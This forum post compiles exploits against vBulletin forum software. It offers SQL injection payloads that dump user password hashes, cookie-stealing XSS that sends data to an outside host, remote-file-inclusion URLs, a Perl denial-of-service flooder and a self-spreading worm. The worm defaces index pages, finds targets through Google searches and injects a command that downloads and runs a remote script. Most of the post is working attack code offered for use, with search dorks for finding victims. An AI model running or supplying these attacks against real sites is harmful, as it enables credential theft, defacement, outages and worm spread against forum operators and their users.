The largest collection of vBulletin exploits on the net

  • The largest collection of vBulletin exploits on the net

    In short, it's all in the title.

    vBulletin 4.0.x => 4.1.2 SQLi Vuln
    Code:
    ====================================================================
    #vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
    ====================================================================
    #                                                                  #
    #         888     d8          888   _   888          ,d   d8       #
    #    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
    #   d888  888   d888   888    888d8b    888  888b   888  888       #
    #   8888  888  / 888   888    888Y88b   888  8888   888  888       #
    #   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
    #    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
    #                                                                  #
    ====================================================================
    #PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
    ====================================================================
     
    #[+] Discovered By   : D4rkB1t
    #[+] Site            : NaN
    #[+] support e-mail  : [email protected]
     
     
    Product: http://www.vbulletin.com
    Version: 4.0.x
    Dork : inurl:"search.php?search_type=1"
     
    --------------------------
    #   ~Vulnerable Codes~   #
    --------------------------
    /vb/search/searchtools.php - line 715;
    /packages/vbforum/search/type/socialgroup.php - line 201:203;
     
    --------------------------
    #        ~Exploit~       #
    --------------------------
    POST data on "Search Multiple Content Types" => "groups"
     
    &cat[0]=1) UNION SELECT database()#
    &cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
    &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
     
    More info: http://j0hnx3r.org/?p=818

    vBulletin <= 3.7.0 XSS Exploit (ajax.php - ajaxReg mod)

    Code:
    vBulletin 3.7.0 <= XSS Exploit
    
        * Requires ajaxReg mod (a common mod)
    
    
    Found by RoBOTNIK
    [email protected]
    l3vel-69.net
    
    What is ajaxReg mod?
    ajaxReg is a common mod used for checking registration details while you are typing them.
    
    ajaxReg:
    http://www.vbulletin.org/forum/showthread.php?t=144869
    
    POC:
    http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
    http://www.site.com/forums/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>

    vBulletin Secure Downloads Mod

    Code:
    ===[FOUND BY BaKo]===
    
    ########################################
    
    Script: vBulletin Secure Downloads Mod
    
    ########################################
    
    Type: SQL Injection
    
    ########################################
    
    Usage:
    
    http://site.com/fileinfo.php?id=-1674'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(username,0x3a,password,0x3a,salt),19,20,21,22,23,24,25,26+from+user/*
    
    (The number of columns varies per site. Use ORDER BY to find the correct number if this doesn't work.)
    
    #######################################
    
    dork: "Powered by Secure Downloads"
    
    #######################################
    
    Discovered by: BaKo -[ciphercrew and h4ck-y0u]-
    
    #######################################
    
    Status: Unpatched
    
    #######################################
    
    Greetz to:
    xprog, Novalok, dr wh4x, tulle, inspiratio, illuz1on, cam-man-dan, optiplex, Untamed, GM, t0pP8uZz, Thedefaced, h4ck-y0u, and everyone else I forgot
    
    ########################################
    
    ~censored~:
    all of balcan-crew, those exploit leaking faggots.
    
    ########################################

    vBulletin 3.x.x 'finalupgrade.php' Exploit

    Code:
    #/usr/bin/perl
    #codEd by dEmOn | mE
    # --
    #   --->    http://devsn.org    <------
    
    ##       ---=== vBulletin 3.x.x 'finalupgrade.php' Exploit ===---        ##
    
    ######################################
    ##    NOTE: This vulnerability is not discovered by me...     ##
    ##     So, I take no credit for the vuln,,,             ##
    ##   I only Coded the exploit... ..   Anyway, idk who        ##
    ##    discovered this vuln,, So, GJ! :)             ##
    ######################################
    
    #   --->    http://devsn.org    <------
    
    use LWP::UserAgent;
    
    $ua = LWP::UserAgent->new;
    $ua->agent("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)");
    
    print "\n ---=== vBulletin 3.x 'finalupgrade.php' Exploit ===---\n\n";
    
    print "\n===============[x]==================\n";
    print "        ._.       ___________._.\n";        
    print "        | | _____ \\_   _____/| |\n";        
    print " ______ | |/     \\ |    __)_ | |  ______\n";
    print "/_____/  \\|  Y Y  \\|        \\ \\| /_____/ \n";
    print "         _|__|_|  /_______  / __ \n";      
    print "         \\/     \\/        \\/  \\/\n";
    print "\n===============[x]==================\n";
    
    print "\n Enter the forum URL(e.g. http://www.site.com/vb/ ): ";
    $url = <STDIN>;
    print "\n\nChecking for vuln..\n";
    
    chomp($url);
    
    my $response = $ua->get($url . 'install/finalupgrade.php?step=http://www.devsn.org');
    if ($response->is_success) {
    if ($response->content =~ m/vBulletin Database Backup System/gi){
    print "\nExploit Success!\n";
    print "\n Go TO: " . $url . "install/finalupgrade.php?step=http://www.devsn.org\n";
    }
    else {
    print "\nNot vuln.. Exploit Failed!\n";
    }
    }
    else {
    print "\nExploit Failed:";
    print "\n" . $response->status_line;
    }
    
    print "\n---=== EOF ===---\n";
    print "\nhttp://devsn.org\n";
    $end = <STDIN>;

    vBulletin Worm <= 3.0.6

    Code:
    #!/usr/bin/perl
    
    #####################
    ####
    #### #### #### #### #### #### #### # # # # ####
    #### # # # # # # # # # # # # # #
    #### #### # # ### ## #### # #### ## ###
    #### # # # # # # # # # # # # #
    #### # #### #### # # #### #### # # # # ####
    ####
    #####################
    
    use IO::Socket::INET;
    $hahaha = $0;
    my $processo = "/usr/local/sbin/httpd";
    $SIG{"INT"} = "IGNORE";
    $SIG{"HUP"} = "IGNORE";
    $SIG{"TERM"} = "IGNORE";
    $SIG{"CHLD"} = "IGNORE";
    $SIG{"PS"} = "IGNORE";
    
    $0="$processo"."\0"x16;
    my $pid=fork;
    exit if $pid;
    
    ########################
    # #
    # search for index files #
    # #
    #######################
    
    system("locate index.* >> index");
    system("find / -name index.* >> index");
    
    open(a,"<index");
    @ind = <a>;
    close(a);
    $b = scalar(@ind);
    for($a=0;$a<=$b;$a++){
    chomp $ind[$a];
    system("echo spykids ownz your server > $ind[$a]");
    }
    
    
    #########################
    # #
    # collect sites and register them #
    # #
    #########################
    
    `cat /etc/httpd/conf/httpd.conf |grep ServerName >> sites`;
    
    
    open(a,"<sites");
    @site = <a>;
    close(a);
    
    $b = scalar(@site);
    
    for($a=0;$a<=$b;$a++)
    {
    $site[$a] =~ s/#//g;
    $site[$a] =~ s/servername//g;
    $site[$a] =~ s/ServerName//g;
    $site[$a] =~ s/ //g;
    $testa = IO::Socket::INET->new(PeerAddr => $site[$a], PeerPort => 80, Proto => "tcp") or next;
    print $testa "GET / HTTP/1.0\n\n";
    print $testa "Host: $site";
    print $testa "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
    print $testa "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
    print $testa "Accept-Language: pt-br, pt;q=0.50";
    print $testa "Accept-Encoding: gzip, deflate, compress;q=0.9";
    print $testa "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
    print $testa "Keep-Alive: 300";
    print $testa "Connection: keep-alive";
    @ow = <$testa>;
    close($teste);
    $ae = "@ow";
    if($ae =~/spykids/i){
    $sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or die "nao conectou";
    print $sock "POST /en/defacements/notify HTTP/1.0\r\n";
    print $sock "Accept: */*\r\n";
    print $sock "Referer: http://www.zone-h.org/en/defacements/notify\r\n";
    print $sock "Accept-Language: pt-br\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    print $sock "Host: www.zone-h.org\r\n";
    print $sock "Content-Length: 385\r\n";
    print $sock "Pragma: no-cache\r\n";
    print $sock "\r\n";
    print $sock "notify_defacer=SpyKids&notify_domain=http%3A%2F%2F$site[$a]&notify_hackmode=18&notify_reason=5&notify=+OK+\r\n";
    
    close($sock);
    }
    }
    
    
    #########################
    # #
    # worm aws.spykids #
    # #
    ########################
    while(1){
    $cmd = '/misc.php?do=page&template={${system(%22cd%20/tmp;curl%20-O%20http://compras.el-nacional.com/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids*;%20wget%20http://compras.el-nacional.com/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids*%22)}}';
    
    
    
    
    @site = "";
    $a=0;
    @dom = (".ar",".au",".aw",".ax",".az",".ba",".bb",".bd",".be",".bf",".bg",".bh",".bi",".bj",".bm",".bn",".bo",".br",".bs",".bt",".bv",".bw",".by",".bz",".ca",".cc",".cd",".cf",".cg",".ch",".ci",".ck" , ".cl", ".cm",".cn",".co",".cr",".cs",".cu", ".cv",".cx",".cy",".cz",".de",".dj",".dk",".dm",".do",".dz", ".ec",".ee",".eg",".eh",".er",".es",".et",".fi",".fj",".fk",".fm", ".fo",".fr",".ga",".gb",".gd",".ge",".gf",".gg",".gh",".gi",".gl", ".gm",".gn",".gp",".gq",".gr",".gs",".gt",".gu",".gw",".gy",".hk", ".hm",".hn",".hr",".ht",".hu",".id",".ie",".il",".im",".in",".io",".iq", ".ir",".is",".it",".je",".jm",".jo",".jp",".ke",".kg",".kh",".ki",".km", ".kn",".kp",".kr",".kw",".ky",".kz",".la",".lb",".lc",".li",".lk",".lr",".ls", ".lt",".lu",".lv",".ly",".ma",".mc",".md",".mg",".mh",".mk",".ml",".mm", ".mn",".mo",".mp",".mq",".mr",".ms",".mt",".mu",".mv",".mw",".mx",".my", ".mz",".na",".nc",".ne",".nf",".ng",".ni",".nl",".no",".np",".nr",".nu",".nz",".om", ".pa",".pe",".pf",".pg",".ph",".pk",".pl",".pm",".pn",".pr",".ps",".pt",".pw",".py", ".qa",".re",".ro",".ru",".rw",".sa",".sb",".sc",".sd",".se",".sg",".sh",".si",".sj",".sk",".sl", ".sm",".sn",".so",".sr",".st",".sv",".sy",".sz",".tc",".td",".tf",".tg",".th",".tj",".tk",".tl",".tm", ".tn",".to",".tp",".tr",".tt",".tv",".tw",".tz",".ua",".ug",".uk",".um",".us",".uy",".uz",".va",".vc",".ve",".vg",".vi",".vn", ".vu",".wf",".ws",".ye",".yt",".yu",".za",".zm",".zw");
    foreach $dom (@dom){
    $site = "www.google.com";
    open(a,">pra.txt");
    print a "";
    close(a);
    ############### google
    
    for($n=0;$n<1000;$n += 100){
    $sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
    print $sock "GET h/search?q=%22Powered+by%3A+vBulletin%22inurl%3A$dom&num=100&hl=en&lr=&as_qdr=all&start=$n&sa=N HTTP/1.0\n\n";
    print $sock "Host: www.google.com";
    print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
    print $sock "Accept-Language: pt-br, pt;q=0.50";
    print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
    print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
    print $sock "Keep-Alive: 300";
    print $sock "Connection: keep-alive";
    @resu = <$sock>;
    close($sock);
    $ae = "@resu";
    while ($ae=~ m/<a href=.*?>.*?<\/a>/){
    $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
    $uber=$1;
    if ($uber !~/translate/)
    {
    if ($uber !~ /cache/)
    {
    if ($uber !~ /"/)
    {
    if ($uber !~ /google/)
    {
    if ($uber !~ /216/)
    {
    if ($uber =~/http/)
    {
    
    substr($uber,0,7) = "";
    $nu = rindex $uber, '/';
    $uber = substr($uber,0,$nu);
    
    
    open(a,">>pra.txt");
    print a "$uber\n";
    close(a);
    
    }}}}}}
    }
    }
    $ark = "pra.txt";
    @si = "";
    open (arquivo,"<$ark");
    @si = <arquivo>;
    close(arquivo);
    $novo ="";
    foreach (@si){
    if (!$si{$_})
    {
    $novo .= $_;
    $si{$_} = 1;
    }
    }
    open (arquivo,">$ark");
    print arquivo $novo;
    close(arquivo);
    open(a,"<pra.txt");
    @site = <a>;
    close(a);
    
    foreach $site (@site){
    chomp $site;
    
    ($site, $dir) = split('/',$site);
    
    
    $soc = IO::Socket::INET->new(PeerAddr => $site, PeerPort => 80, Proto => "tcp") or next;
    print $soc "GET /$dir$cmd HTTP/1.0\n\n";
    print $soc "Host: $site";
    print $soc "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
    print $soc "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
    print $soc "Accept-Language: pt-br, pt;q=0.50";
    print $soc "Accept-Encoding: gzip, deflate, compress;q=0.9";
    print $soc "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
    print $soc "Keep-Alive: 300";
    print $soc "Connection: keep-alive";
    close($soc);
    
    }
    }
    }

    [Perl]vBulletin Version 4.0.1 Remote SQL Injection Exploit

    Code:
    #!/usr/bin/perl 
     
    use IO::Socket; 
     
     
    print q{ 
    #######################################################################
    #    vBulletin? Version 4.0.1 Remote SQL Injection Exploit            #
    #                      By indoushka                                   #
    #                     www.iq-ty.com/vb                                #
    #               Souk Naamane  (00213771818860)                        #
    #           Algeria Hackerz ([email protected])                   # 
    #          Dork: Powered by vBulletin? Version 4.0.1                  #            
    ####################################################################### 
    }; 
     
    if (!$ARGV[2]) { 
     
    print q{ 
        Usage: perl  VB4.0.1.pl host /directory/ victim_userid 
     
           perl  VB4.0.1.pl www.vb.com /forum/ 1 
     
     
    }; 
     
    } 
     
     
    $server = $ARGV[0]; 
    $dir    = $ARGV[1]; 
    $user   = $ARGV[2]; 
    $myuser = $ARGV[3]; 
    $mypass = $ARGV[4]; 
    $myid   = $ARGV[5]; 
     
    print "------------------------------------------------------------------------------------------------\r\n"; 
    print "[>] SERVER: $server\r\n"; 
    print "[>]    DIR: $dir\r\n"; 
    print "[>] USERID: $user\r\n"; 
    print "------------------------------------------------------------------------------------------------\r\n\r\n"; 
     
    $server =~ s/(http:\/\/)//eg; 
     
    $path  = $dir; 
    $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; 
     
     
    print "[~] PREPARE TO CONNECT...\r\n"; 
     
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; 
     
    print "[+] CONNECTED\r\n"; 
    print "[~] SENDING QUERY...\r\n"; 
    print $socket "GET $path HTTP/1.1\r\n"; 
    print $socket "Host: $server\r\n"; 
    print $socket "Accept: */*\r\n"; 
    print $socket "Connection: close\r\n\r\n"; 
    print "[+] DONE!\r\n\r\n"; 
     
     
     
    print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; 
    while ($answer = <$socket>) 
    { 
     
     if ($answer =~/(\w{32})/) 
    { 
     
      if ($1 ne 0) { 
       print "Password is: ".$1."\r\n"; 
    print "--------------------------------------------------------------------------------------\r\n"; 
     
          } 
    exit(); 
    } 
     
    } 
    print "------------------------------------------------------------------------------------------------\r\n";

    vBulletin 'ads_saed' script 'bnnr.php' SQL Injection Vulnerability

    Code:
    Attackers can use a browser to exploit this issue.
    
    The following example input is available:
    
    user name = ' ORDER BY 15/*
    user name = ' ORDER BY 16/*
    user name = ' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*

    vBulletin 3.8.2 Denial of Service Exploit

    Code:
    #!usr/bin/perl
    #vBulletin® Version 3.8.2 D3n14l 0f S3rv1c3 Expl01t
    #HaCker Anger - Qkk (at) Hotmail (dot) Fr [email concealed]
    ########################################################################
    
    # Modules #
    ########################################################################
    
    use IO::SOCKET; # Object interface #
    ########################################################################
    
    if (@ARGV<1){
    print"
    ########################################################################
    
    ## Author : Hacker Anger ##
    ## TeaM : The Assassin Scorpion TeaM ##
    ## Home : http://Baloma.NeT ##
    ## Mail : Qkk (at) Hotmail (dot) Fr [email concealed] ##
    ## ##
    ########################################################################
    
    ########################################################################
    
    ## ## ##
    ##->vBulletin 3.8.2 Denial of Service Exploit<- ##
    ##
    ## ## ##
    ##Enter These Exploit ## ##
    ##1.Target ##[*] www.Baloma.net ##
    ##2.Forum ##[*] vbulletin ##
    ##3.Exploit ##[*] forumdisplay.php?f= ##
    ##4.Execution length/timeout ##[*] 7777777777777777 ##
    ##5.Port ##[*] 80 ##
    ########################################################################
    
    \a";}
    $anger_Block = "
    ########################################################################
    ";
    $Hacker = "Error!Error!Error!Error";
    $H-a =0;
    print"$anger_Block\n";
    print q(Target->);
    chomp($H-zi3l =<STDIN>);
    if ($H-zi3l eq""){
    die "$Hacker\a\n";}
    print"$anger_Block\n";
    print"$anger_Block\n";
    print q(Path->);
    chomp($H4ck3r_4n93r =<STDIN>);
    if ($H4ck3r_4n93r eq "") {
    die "$Hacker !\a\n";}
    print"$anger_Block\n";
    print"$anger_Block\n";
    print "Vulnerability\n";
    print"forumdisplay.php?f=\n";
    print"->\n";
    chomp($Exploit =<STDIN>);
    if ($Exploit eq "") {
    die "$Hacker !\a\n";}
    print"$anger_Block\n";
    print"$anger_Block\n";
    print q(Time->);
    chomp($H-flood =<STDIN>);
    if ($H-flood eq "") {
    die "$Hacker !\a\n";}
    print"$anger_Block\n";
    print"$anger_Block\n";
    print q(Port->);
    chomp($p0rt =<STDIN>);
    if ($p0rt eq ""){
    die "$Hacker \n";}
    print"$anger_Block\n";
    print q(Send "start"->);
    chomp($H-start =<STDIN>);
    if ($H-start eq "") {
    die "$Hacker\n";}
    print "$anger_Block\a\n";
    print "[+]Check Data \n";
    print "[*]Check Target : $H-zi3l\n";
    print "[*]Check Forum : $H4ck3r_4n93r\n";
    print "[*]Checking Port : $p0rt\n";
    print "$anger_Block\n";
    if($H-start == 1){
    while($H-a != 0000){
    $H-a++;}
    }elsif ($H-start == start){
    while($H-a != $H-flood)
    {
    $4n93r_postit = "$H-zi3l"."$H4ck3r_4n93r"."$Exploit";
    $4n93r_l = length $4n93r_postit;
    $4n93r = new IO::Socket::INET (
    PeerAddr => "$H-zi3l",
    PeerPort => "$p0rt",
    Proto => "tcp",
    );
    
    print $4n93r "POST $H4ck3r_4n93r$Exploit HTTP/1.1\n";
    print $4n93r "Host: $H-zi3l\n";
    print $4n93r "Accept:
    text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
    n;q=0.8,image/png,*/*;q=0.5\n";
    print $4n93r "Referer: $H-zi3l\n";
    print $4n93r "Accept-Language: en-us\n";
    print $4n93r "Content-Type: application/x-www-form-urlencoded\n";
    print $4n93r "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;
    rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
    print $4n93r "Content-Length: $4n93r_l\n\n";
    print $4n93r "$4n93r_postit\n";
    close($4n93r);
    syswrite STDOUT, "->BLACKOUT<-";
    $H-a++;
    }
    }else{
    die "Error - can't connect to target $H-zi3l !\n";
    }

    vBulletin multiple XSS

    Code:
    vBulletin 3.8.2 adminCP Cross-Site Scripting
    R.I.P DrtRp - We miss you
    ---------------------------------------------
    Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
    Greetz to Aura & all Aria-Security Mods & Members
    
    These were all tested on vBulletin 3.8.0 RC2, so other versions may be affected.
    
    1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.
    
    <script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
    or any other XSS code.
    
    2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.
    
    <script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
    
    3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2. use the following code as title name.
    
    <script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
    
    4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.
    
    <script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

    Secure Downloads for vBulletin 'fileinfo.php' SQL Injection Vulnerability

    Code:
    http://www.example.com/fileinfo.php?id=1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0

    Multiple Sql Injection in vBulletin 3.7.4

    Code:
    1. Sql Injection in "admincp/verify.php"
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~~~~~
    
    Impact: low
    Preconditions: attacker must have admin account with Human Verification Manager
    administer privileges
    
    [---------- source code snippet start ----------]
    if ($_POST['do'] == 'updateanswer')
    {
        $vbulletin->input->clean_array_gpc('p', array(
            'answer' => TYPE_STR,
        ));
        ..
        $db->query_write("
            UPDATE " . TABLE_PREFIX . "hvanswer
            SET answer = '" . $vbulletin->GPC['answer'] . "'
            WHERE answerid = " . $vbulletin->GPC['answerid']
        );
    [----------- source code snippet end -----------]
    
    It appears that the user-submitted parameter "answer" is not properly sanitized
    before being used in the SQL query. As a result, SQL injection is possible. The
    test will induce an SQL error message:
    
    Invalid SQL:
    UPDATE vb_hvanswer
    SET answer = 'war'axe'
    WHERE answerid = 1;
    
    2. Sql Injection in "admincp/attachmentpermission.php"
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~
    
    Impact: low
    Preconditions: attacker must have admin account with Attachment Permissions
    Manager administer privileges
    
    As in the previous case, a user-submitted parameter, this time "extension", is
    used in an SQL query without proper sanitization. This results in an SQL injection
    vulnerability. To test, log in as admin with the needed privileges and then issue a
    GET request (using the proper URI instead of the example):

    http://localhost/vbulletin374/admincp/attachmentpermission.php?do=edit&extension=war'axe
    
    This results with error message from vBulletin:
    
    Database error in vBulletin 3.7.4:
    Invalid SQL:
    
    SELECT size, width, height
    FROM attachmenttype
    WHERE extension = 'war'axe';
    
    3. Sql Injection in "admincp/image.php"
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~
    
    Impact: low
    Preconditions: attacker must have admin account with Avatars administer privileges
    
    [---------- source code snippet start ----------]
    if ($_POST['do'] == 'updatepermissions')
    {
        $vbulletin->input->clean_array_gpc('p', array(
            'iperm' => TYPE_ARRAY,
            'imagecategoryid' => TYPE_INT
        ));
        ..
        foreach($vbulletin->GPC['iperm'] AS $usergroupid => $canuse)
        {
            if ($canuse == 0)
            {
                $db->query_write("
                    INSERT INTO " . TABLE_PREFIX . "imagecategorypermission
                    (
                        imagecategoryid,
                        usergroupid
                    )
                    VALUES
                    (
                        " . $vbulletin->GPC['imagecategoryid'] . ",
                        $usergroupid
                    )
    [----------- source code snippet end -----------]
    
    User-submitted array "iperm" is used in sql query without proper sanitization.
    This results in sql injection. Testing ends with error message:
    
    MySQL Error : Unknown column 'waraxe' in 'field list'

    XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower

    Code:
    The XSS in question exists on the log viewing page of the admin control panel.
    
    When a missing page is requested, a log is created in the admin area, however
    the inputs to this log lack sanitation. The script name is taken from
    basename(PHP_SELF), while the action is taken from _REQUEST['do']. Either one
    can be used for introducing XSS vectors.
    
    To highlight the severity and underline the fact that this vulnerability is
    exploitable:
    
    <html>
    <body>
    <img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" />
    <img src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri
    '/*"
    />
    <img src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<scrip
    t
    '/*" />
    <img src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'
    /*"
    />
    <!--edit to match your data -->
    <img src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/
    *"
    />
    <img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" />
    <img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip
    '/*"
    />
    <!-- end edit -->
    <img src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" />
    <img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd
    %2Be%2Bf%2Bg/*"
    />
    <img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" />
    <img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>" />
    </body>
    </html>
    
    You then need to send the admin to
    adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1
    and the XSS will render.
    
    The limits on the XSS:
    basename(PHP_SELF) is 50 characters max and no slashes
    _REQUEST['do'] is limited to 20 characters, but no character restriction.
    
    The tight character limits on the unsanitized parameters are not mitigating
    the severity, as unlimited attack space can be obtained as shown above.

    As per my last exploits, all XSS in the vBulletin ACP can be used for PHP
    injection instantly. This is due to the design of the vBulletin hooks
    feature. As this particular XSS is persistent and will render in all major
    browsers it is particularly dangerous.

    vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1: XSS in modcp index

    Code:
    The XSS in question exists on the login page for the MCP (moderation
    control panel). The login script takes a redirect parameter that lacks
    sanitation, allowing a rather easy XSS:

    http://localhost/vB3/modcp/index.php?redirect={XSS}

    What is even better is that the exploit will work outright if the
    admin/moderator is already logged in; if the admin/moderator is not, they
    will be required to log in. However, if an admin logs into the MCP, he is
    also logged into the ACP, allowing the same exploit as last time (remote
    PHP code injection via the hooks system).
    
    If you Base64-encode your attack vector using
    the data: URI scheme, the XSS survives the login request and activates after
    the admin/moderator is logged in. A simple example of the above:
    
    http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
    
    In this case (as per the last case as well), you have an unlimited and
    unaltered XSS space, so you're free to invoke some AJAX and have fun.
    Just to give ideas on how this could turn into something larger,
    vBulletin has hooks that operate using eval(), and new hooks can
    be added via the ACP itself. It is trivial to write some JS that not only
    enables hooks but also inserts a nice RFI hook. Here's one using the data
    URI:
    
    
    The above will survive a login prompt. It will then, once executed, proceed
    to parse one of the ACP pages and extract the admin hash and token, then
    it will enable hooks and add one that executes phpinfo().
    
    Obviously the above requires an admin in this context. Similar techniques
    could be used to exploit the modcp as usual, banning users, enabling the
    pruning of threads etc.

    If you want to cause annoyance, you can easily exploit just a moderator
    (and thus have more success in the exploit being run). This example
    enables pruning for all forums on all posts:
    
    
    In order to exploit, just get an admin/moderator to click the link.
    RFI ====> vBulletin v3.6.5

    Code:
    vBulletin v3.6.5
    
    Dork : "Powered by vBulletin v3.6.5. Copyright ©2000 - 2007 "
    
    -----------------------------------
    
    Exploits :
    
    Http://WWW.Victim.Com/vb/includes/functions.php?classfile=[Shell-Attack]
    
    Http://WWW.Victim.Com/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
    
    Http://WWW.Victim.Com/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]
    vBulletin v 2.3 .* SQL Injection Vulnerability

    Code:
    www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (), userid FROM calendar_events WHERE eventid = 14) order by eventdate
    vBulletin 3.0.0 XSS Vulnerability

    Code:
    3.0.0: search.php
    www.xhh777hhh.som/forumpath//search.php?do=process&showposts=0&query = <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s. jpg? »+ document.cookie; </ script>
    3.0-3.0.4: forumdisplay.php
    www.xhh777hhh.som/forumpath/forumdisplay.php?GLOBALS [] = 1 & f = 2 & comma = ». System ( 'id').»
    3.0.3-3.0.9: XSS in the status
    <body onLoad=img = new Image(); img.src = «http://antichat.ru/cgi-bin/s.jpg?»+document.cookie;>
    3.0.9 and 3.5.4: newthread.php
    www.site.com/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML =% 3Cp% 3E% 3C% 2Fp% 3E & s = & f = 3 & do = postthread & posthash = c8d3fe38b082b6d3381cbee17f1f1aca & poststarttime = '% 2Bimg = new Image (); img. src = «http://antichat.ru/cgi-bin/s.jpg?» + document.cookie;% 2B '& sbutton =% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2 % F3% FE +% F2% E5% EC% F3 & parseurl = 1 & disablesmilies = 1 & emailupdate = 3 & postpoll = yes & polloptions = 1234 & openclose = 1 & stickunstick = 1 & iconid = 0
    vBulletin v 4.0.1 XSS Vulnerability

    Code:
    Exploit: http://[HOST]/forum/calendar.php="<script>alert("! XSS!");</script>
    vBulletin Version 4.0.2 Xss Vulnerability

    Code:
    http://127.0.0.1/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
